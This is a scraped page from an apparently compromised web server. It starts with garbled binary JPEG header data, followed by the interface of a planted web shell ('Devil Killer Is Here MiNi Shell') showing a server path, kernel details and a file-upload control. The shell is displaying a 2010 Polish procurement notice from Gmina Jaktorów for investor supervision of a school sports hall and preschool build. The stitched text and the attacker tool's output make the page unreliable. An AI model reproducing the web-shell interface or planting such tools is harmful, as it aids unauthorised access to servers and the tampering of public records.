JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100702/175347-N-2010.html

<p class="kh_header"><b>Jaktorów: Pełnienie nadzoru inwestorskiego dla zadania pn Budowa hali sportowej wraz z przedszkolem, biblioteką i łącznikiem przy Zespole Szkół w Międzyborowie ul. Staszica 5</b><br>
<b>Numer ogłoszenia: 175347 - 2010; data zamieszczenia: 02.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jaktorów , ul. Warszawska 33, 96-313 Jaktorów, woj. mazowieckie, tel. 046 8564026, 8564069, faks (046) 855 21 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaktorow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego dla zadania pn Budowa hali sportowej wraz z przedszkolem, biblioteką i łącznikiem przy Zespole Szkół w Międzyborowie ul. Staszica 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: usługę pełnienia nadzoru inwestorskiego dla zadania pn. Budowa hali sportowej wraz z przedszkolem, biblioteką i łącznikiem przy Zespole Szkół w Międzyborowie ul. Staszica 5  o szacowanej wartości zamówienia 16 000 000,00 zł brutto, wraz z dostawą i montażem wyposażenia hali sportowej
wynikająca z realizacji projektu współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu VII Tworzenie i poprawa warunków dla rozwoju kapitału ludzkiego , Działania 7.2 Infrastruktura służąca edukacji Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007 - 2013 pn. Poprawa jakości nauczania i wyrównywanie szans edukacyjnych dzieci i młodzieży wiejskiej przez budowę przedszkola, organizację klas 0 biblioteki hali sportowej  wraz z łącznikiem przy Zespole Szkół Publicznych w Międzyborowie. Zamówienie będzie wykonywane na terenie miejscowości Międzyborów w gminie Jaktorów
W ramach projektu wykonane zostaną następujące prace:

1) budowę hali sportowej (widownia na 140 miejsc) wraz z zapleczem, biblioteką przedszkolem i łącznika z Zespołem Szkół Publicznych  
2) wykonanie miejsc parkingowych w ilości 40 miejsc, w tym 2 miejsca dla osób niepełnosprawnych, dojścia i dojazdy, 3 zjazdy do istniejących dróg wraz ze zmianą ich organizacji oraz chodniki,
3) wykonanie przyłącza wodociągowego i kanalizacji sanitarnej,
4) wykonanie przyłącza instalacji gazowej,
5) wykonanie przyłącza kanalizacji deszczowej,
6) wykonanie instalacji wody zimnej, ciepłej i cyrkulacji,
7) wykonanie instalacji c.o., oraz c.t.,
8) wykonanie instalacji gazowej oraz kotłowni gazowej,
9) wykonanie kanalizacji sanitarnej oraz deszczowej,
10) wykonanie instalacji wentylacyjnej,
11) wykonanie instalacji elektrycznej: wewnętrznej i teletechnicznej
12) dostawę i montaż wyposażenia hali sportowej,
13) wykonanie ogrodzenia terenu.
W ramach robót budowlanych przewiduje się w szczególności: roboty ziemne w zakresie przygotowania
terenu pod budowę, betonowanie i konstrukcje z betonu zbrojonego, zbrojenie, prefabrykaty, stropy,
konstrukcje stalowe, roboty murarskie,  wykonanie pokryć dachowych, tynkowanie, wykładanie ścian,
posadzki, roboty w zakresie stolarki budowlanej, ślusarka, roboty malarskie, roboty izolacyjne i in.
W wyniku tych prac powstanie obiekt, o łącznej powierzchni 3715m2, zawierający:
I. Budynek przedszkola o pow. użytkowej 952m2 obejmie dwa odrębne przestrzennie zespoły pomieszczeń:
- na parterze - czterooddziałowe przedszkole z segmentem żywieniowym. 
- na piętrze 4 klasy nauczania początkowego tzw. klasy zerowe.
II. Drugi budynek o pow. użytkowej 2695m2 obejmie:
Halę sportową:
- (arena o wymiarach 36x22) z widownią stałą na 140 widzów (możliwość organizacji dodatkowych 35 miejsc),
- 4 zespoły szatniowe i natryskownie,
- sanitariaty,
- magazyny sprzętu sportowego,
- pomieszczenia dla trenerów,
- zespół pomieszczeń obsługowych (kawiarenka - sklepik, sala bilardowa) klubowych (klub fitness z sauną i zapleczem) i towarzyszących (radiowęzeł, obserwatorium astronomiczne)
- biblioteka z czytelnią i centrum informatycznym. 
III. Uzupełnieniem infrastruktury będzie łącznik (68m2) umożliwiający komunikację między istniejącą częścią kompleksu szkolnego (izby lekcyjne, świetlica) a nowowybudowanymi obiektami. Budowa łącznika umożliwi także zorganizowanie dodatkowych pokoi dla administracji placówki.  
Inwestycja wpłynie także na organizację terenu wokół szkoły, na którym zostanie wybudowany parking na 40 miejsc, w tym miejsca dla osób niepełnosprawnych. Zmieniona zostanie także obsługa komunikacyjna kompleksu - projektowane zostaną dojścia i dojazdy, 3 zjazdy do istniejących dróg wraz ze zmianą ich organizacji oraz chodniki, co zapewni bezpieczeństwo użytkowników obiektu.
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót składająca się z następujących dokumentów:
Segment A - Hala sportowa z biblioteką
Projekt architektoniczno-budowlany segmentu A.      
Segment B - Łącznik
Projekt architektoniczno-budowlany segmentu B.
Segment C - Przedszkole
Projekt architektoniczno-budowlany segmentu C.
Projekt budowlano - wykonawczy na wykonanie kotłowni gazowej .
Projekt budowlano - wykonawczy na wykonanie instalacji centralnego ogrzewania.
Projekt budowlany ogrodzenia panelowego, specyfikacja techniczna wykonania i odbioru robót budowlanych, kosztorys inwestorski, przedmiar robót.
Projekt branży drogowej.
Projekt branży sanitarnej - projekt instalacji wod-kan, projekt przyłączy wod-kan i odwodnienia terenu,  projekt przyłącza gazowego wraz z instalacją.
Projekt branży instalacji elektrycznej wewnętrznej.
Projekt konstrukcyjny segmenty A, B, C.
Projekt zagospodarowania terenu segmenty A, B, C. 
Dokumentacja geotechniczna .
Dokumentacja  formalno - prawna zestawienia i tabele segmenty A, B, C
Projekt wykonawczy instalacji wentylacji mechanicznej. 
Przedmiary robót na wykonanie kotłowni gazowej, instalacji c.o, gazowej i wod-kan, instalacji elektrycznych wewnętrznych, przygotowania terenu pod budowę i roboty ziemne, na roboty budowlane Segment A - Hala sportowa z biblioteką, Segment B - Łącznik, Segment C - Przedszkole, na nawierzchnie nieutwardzone dróg, na utwardzenie terenu, na wykonanie wentylacji mechanicznej, na wykonanie przyłącza wod-kan. 
Specyfikacje techniczne wykonania i odbioru robót budowlanych dla:
robót budowlanych, instalacji c.o., kotłowni wodnej gazowej, instalacji wentylacji wewnętrznej, instalacji wew. wod-kan i cw, przyłącza gazu wraz z instalacjami, przyłącza wod-kan i odwodnienia terenu,  instalacji elektrycznej, przebudowy sieci energetycznej stacji trafo i linii nn, robót drogowych.
Informacja dotycząca bezpieczeństwa i ochrony zdrowia segmenty A, B, C. 
Na wyżej opisany zakres robót Zamawiający posiada aktualną  Decyzję o zezwoleniu na realizację inwestycji budowlanej.
W ramach niniejszego zamówienia Wykonawca zobowiązuje się do: 
1) reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji    z dokumentacją projektową tj. ze  Szczegółowymi specyfikacjami technicznymi, pozwoleniem na budowę, przepisami Prawo budowlane oraz zasadami wiedzy technicznej, 
2) sprawdzania zgodności wykonania robót z projektem budowlanym, projektami wykonawczymi, specyfikacjami technicznymi, przepisami techniczno-wykonawczymi, normami i przepisami bhp,
 3) współpracy z projektantem, w tym do egzekwowania usunięcia ewentualnych usterek w dokumentacji projektowej, 
4) bieżącej kontroli zgodności wykonywanych prac z harmonogramem rzeczowo-finansowym robót, 
5) podejmowania działań w celu dotrzymania terminu realizacji budowy, 
6) podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) materiałów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy, normy i wymagania sformułowane w umowie                    z wykonawcą robót, w dokumentacji projektowej i specyfikacjach technicznych (wg wzoru przedstawionego przez Zamawiającego). 
7) zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umowy           i dokumentacją projektową,
8) sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych, a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie, kontroli i archiwizacji dokumentów potwierdzających dopuszczenie tych materiałów do obrotu, 
9) sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia w próbach i odbiorach technicznych sieci i urządzeń technicznych oraz udział w czynnościach przekazania terenu budowy,  
10) wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych, 
11) żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, 
12 kontrolowania ilości i terminowości wykonywanych robót zgodnie z harmonogramem rzeczowo-finansowym, 
13) kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót ,
14) uczestniczenia w dokonywaniu odbiorów częściowych inwestycji, 
15) wstrzymania dalszych robót budowlanych, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę, 
16) przygotowania zadania inwestycyjnego do odbioru końcowego - sprawdzenie i zatwierdzenie dokumentacji powykonawczej (operatu kolaudacyjnego), w tym powykonawczej dokumentacji geodezyjnej, rozliczenia robót, 
17) uczestniczenia w procedurze oddania przedmiotu umowy do użytkowania (do momentu uzyskania stosownego dokumentu pozwalającego na użytkowanie), 
18) sprawdzania zgodności faktur Wykonawcy z przerobami zaakceptowanymi w harmonogramie rzeczowo-finansowym, 
19) składania sprawozdań miesięcznych z postępu robót. W sprawozdaniu należy przedstawić: 
a) szczegółowy wykaz robót wykonanych w okresie sprawozdawczym oraz narastająco od początku budowy. 
b) analizę zgodności postępu robót z harmonogramem rzeczowo-finansowym. 
c) informację  o napotkanych problemach i podjętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie zwłaszcza w sprawach mogących wpłynąć na termin zakończenia robót). 20) Niezależnie od składania sprawozdań Nadzór Inwestorski będzie informował na bieżąco Zamawiającego o przebiegu prac. 
21) nadzorowania budowy w takich odstępach czasu, aby była zapewniona skuteczność nadzoru, jednak nie rzadziej niż 2 raz w tygodniu oraz na każde żądanie Zamawiającego - Inwestora w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna najpóźniej w następnym dniu od powiadomienia pisemnego lub ustnego za pośrednictwem telefonu, faksu, 
22) analiza dokumentacji projektowej  zadania pn. Budowa hali sportowej wraz z przedszkolem, biblioteką i łącznikiem przy Zespole Szkół w Międzyborowie ul. Staszica 5  pod kontem jej kompletności i poprawności oraz pomoc w przygotowaniu odpowiedzi na pytania Wykonawców.
2. Wykonawca zobowiązany jest do wykonania przedmiotu umowy  zgodnie ze złożoną  ofertą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje  możliwość udzielenia zamówienia uzupełniającego  o wartości nie przekraczającej 50% wartości zamówienia na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje wykonanie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej usługi, której przedmiotem było pełnienie funkcji nadzoru inwestorskiego w zakresie robót ogólnobudowlanych, sanitarnych (w tym instalacji wentylacji mechanicznej) i elektrycznych dla inwestycji polegającej na budowie lub przebudowie obiektu budowlanego o powierzchni użytkowej  min. 3500 m2 i wartości nadzorowanej inwestycji co najmniej 15 000 000,00 złotych brutto a usługa ta została wykonane należycie.
zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie minimum 3 osobami - inspektorami nadzoru branży budowlanej, sanitarnej i elektrycznej  -posiadającymi każdy, minimum 3 letnie doświadczenie w kierowaniu robotami lub pełnieniu funkcji inspektora nadzoru w branży do której został wskazany.
zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje również możliwość zmiany terminu, jeżeli konieczny będzie  dodatkowy czas na wykonanie robót budowlanych będących w zakresie nadzoru inwestorskiego w przypadku:
a) zmiany dokumentacji projektowej lub/i specyfikacji technicznych wykonania i odbioru robót ;
b)  siły wyższej
c) w przypadku wystąpienia warunków atmosferycznych uniemożliwiających wykonawcy robót budowlanych realizację robót w terminie wskazanym w ofercie tj. w przypadku:
-  występowania temperatury powietrza poniżej 0 stopni  w dzień i w nocy utrzymującej się przez okres co najmniej 7 dni
-  topnienia znacznych mas śniegu ( podtopienia ) po okresie zimy 2010/2011/2012
	                 -   występowania  intensywnych opadów deszczu utrzymujących się przez okres co najmniej 14  dni 
d) opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez/ lub dające się przypisać Zamawiającemu, personelowi Zamawiającego; lub innemu wykonawcy, zatrudnionemu przez Zamawiającego na terenie budowy;
e) zmiany w sposobie lub terminach dofinansowania Umowy przez instytucję wdrażającą;
f) konieczności wprowadzenia wszelkich zmian z inicjatywy podmiotu współfinansującego zadanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jaktorow.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Jaktorów, 96-313 Jaktorów, ul. Warszawska 33, woj. mazowieckie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2010 godzina 11:00, miejsce: Gmina Jaktorów, 96-313 Jaktorów, ul. Warszawska 33, pokój nr 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia obejmuje: usługę pełnienia nadzoru inwestorskiego dla zadania pn. Budowa hali sportowej wraz z przedszkolem, biblioteką i łącznikiem przy Zespole Szkół w Międzyborowie ul. Staszica 5 wraz z dostawą i montażem wyposażenia hali sportowej wynikająca z realizacji projektu współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu VII Tworzenie i poprawa warunków dla rozwoju kapitału ludzkiego, Działania 7.2 Infrastruktura służąca edukacji Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007 - 2013 pn. Poprawa jakości nauczania i wyrównywanie szans edukacyjnych dzieci i młodzieży wiejskiej przez budowę przedszkola, organizację klas 0  biblioteki hali sportowej  wraz z łącznikiem przy Zespole Szkół Publicznych w Międzyborowie..</p>
